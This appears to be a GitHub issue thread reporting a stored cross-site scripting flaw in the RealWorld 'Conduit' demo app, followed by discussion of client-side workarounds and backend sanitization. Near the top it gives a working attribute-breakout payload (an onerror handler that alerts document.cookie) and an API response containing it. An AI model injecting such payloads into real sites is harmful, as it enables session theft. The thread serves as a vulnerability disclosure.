JavaScript Attack

[Weedshaker]

It is possible to inject JavaScript through the image url, see below:

"image":"https://www.gettyimagcadsaes.com/gi-resources/images/500px/983794168.jpg\"onerror=\"javascript:alert(document.cookie)"

You can trigger this by selecting Tag #Dragons at page 37 (at some examples, eg.: https://conduit-vanilla.herokuapp.com/#/)

The result of the attack is:
<img src="https://www.gettyimagcadsaes.com/gi-resources/images/500px/983794168.jpg" onerror="javascript:alert(document.cookie)">

And here the full Request URL:https://conduit.productionready.io/api//articles?limit=10&offset=360&tag=dragons payload:
{"articles":[{"title":"How to train your dragon","slug":"how-to-train-your-dragon-qp6z5i","body":"Very carefully.","createdAt":"2018-11-02T16:27:16.359Z","updatedAt":"2018-11-02T16:27:16.359Z","tagList":["training","dragons"],"description":"Ever wonder how?","author":{"username":"u1541176017","bio":null,"image":"https://static.productionready.io/images/smiley-cyrus.jpg","following":false},"favorited":false,"favoritesCount":7},{"title":"How to train your dragon5","slug":"how-to-train-your-dragon-p6to53","body":"You have to believe","createdAt":"2018-11-02T04:52:49.257Z","updatedAt":"2018-11-02T06:31:09.448Z","tagList":["dragons","angularjs","reactjs"],"description":"Ever wonder how?","author":{"username":"kfc","bio":"This is my bio...","image":"https://oldgameshelf.com/img/icons/Icon-152.png","following":false},"favorited":false,"favoritesCount":4},{"title":"tu mera bhai","slug":"tu-mera-bhai-fysljd","body":"mera bhi","createdAt":"2018-10-31T11:12:37.933Z","updatedAt":"2018-10-31T12:31:12.992Z","tagList":["angular","dragons","mera","aacha"],"description":"tu bhi ","author":{"username":"ashish71294","bio":"","image":"https://static.productionready.io/images/smiley-cyrus.jpg","following":false},"favorited":false,"favoritesCount":8},{"title":"mera haal","slug":"mera-haal-n41nto","body":"or ter","createdAt":"2018-10-31T11:08:52.970Z","updatedAt":"2018-10-31T11:19:16.512Z","tagList":["angular","dragons"],"description":"aacha hai","author":{"username":"ashish71294","bio":"","image":"https://static.productionready.io/images/smiley-cyrus.jpg","following":false},"favorited":false,"favoritesCount":6},{"title":"fsdf","slug":"fsdf-xotd5k","body":"asdf","createdAt":"2018-10-31T07:17:59.731Z","updatedAt":"2018-10-31T07:19:34.367Z","tagList":["dragons"],"description":"sdf","author":{"username":"sadfsdfsdf);","bio":null,"image":"https://www.gettyimagcadsaes.com/gi-resources/images/500px/983794168.jpg\"onerror=\"javascript:alert(document.cookie)","following":false},"favorited":false,"favoritesCount":2},{"title":"helloooooooooooooooooooooooooooooooooooooooooooooo","slug":"helloooooooooooooooooooooooooooooooooooooooooooooo-gynt55","body":"Hey.","createdAt":"2018-10-27T02:34:20.388Z","updatedAt":"2018-10-27T02:34:20.388Z","tagList":["dragons"],"description":"some stuff","author":{"username":"jabvlaiughwi;bkgads","bio":null,"image":"https://static.productionready.io/images/smiley-cyrus.jpg","following":false},"favorited":false,"favoritesCount":6},{"title":"My Oh My","slug":"my-oh-my-kyrwf6","body":"With two hands","createdAt":"2018-10-23T14:01:27.085Z","updatedAt":"2018-10-23T14:01:57.934Z","tagList":["training","dragons"],"description":"Ever wonder how?","author":{"username":"alteckoljasdf","bio":null,"image":"http://www.free-icons-download.net/images/woof-icon-86452.png","following":false},"favorited":false,"favoritesCount":12},{"title":"hi","slug":"hi-67apkj","body":"hi","createdAt":"2018-10-23T12:36:26.677Z","updatedAt":"2018-10-23T12:36:26.677Z","tagList":["dragons","angularjs","reactjs"],"description":"hi","author":{"username":"hansika9","bio":"hello, this is hansika.","image":"https://static.productionready.io/images/smiley-cyrus.jpg","following":false},"favorited":false,"favoritesCount":2},{"title":"hello","slug":"hello-v4jfr7","body":"hello","createdAt":"2018-10-23T12:35:51.285Z","updatedAt":"2018-10-23T12:35:51.285Z","tagList":["dragons","angularjs","reactjs"],"description":"hello","author":{"username":"hansika9","bio":"hello, this is hansika.","image":"https://static.productionready.io/images/smiley-cyrus.jpg","following":false},"favorited":false,"favoritesCount":1},{"title":"How to train your dragon","slug":"how-to-train-your-dragon-b5fyxz","body":"You have to believe","createdAt":"2018-10-23T05:28:32.044Z","updatedAt":"2018-10-23T05:28:32.044Z","tagList":["dragons","angularjs","reactjs"],"description":"Ever wonder how?","author":{"username":"aspirationalTalkBoss","bio":null,"image":"https://static.productionready.io/images/smiley-cyrus.jpg","following":false},"favorited":false,"favoritesCount":7}],"articlesCount":500}

[Weedshaker]

I now fixed it at my example: https://weedshaker.github.io/event-driven-web-components-realworld-example-app/src/#/ with a workaround https://github.com/Weedshaker/event-driven-web-components-realworld-example-app/blob/master/src/es/helpers/Utils.js and Angular seems to do this out of the box. Although, the proper solution would be to have this fixed within the Backend!

[JoeyMckenzie]

Good catch. This seems to be taken care of by Blazor WebAssembly sanitation as well. Thanks for pointing this out!

[melissamcewen]

Would be useful to sanitize a bit on the backend in general. Like limit some of the words allowed. Right now the tags are populated with things like "Hilter" and "butt" plus a bunch of blank ones

[Weedshaker]

agreed, its kinda embarrassing when showing this conduit example in a business context.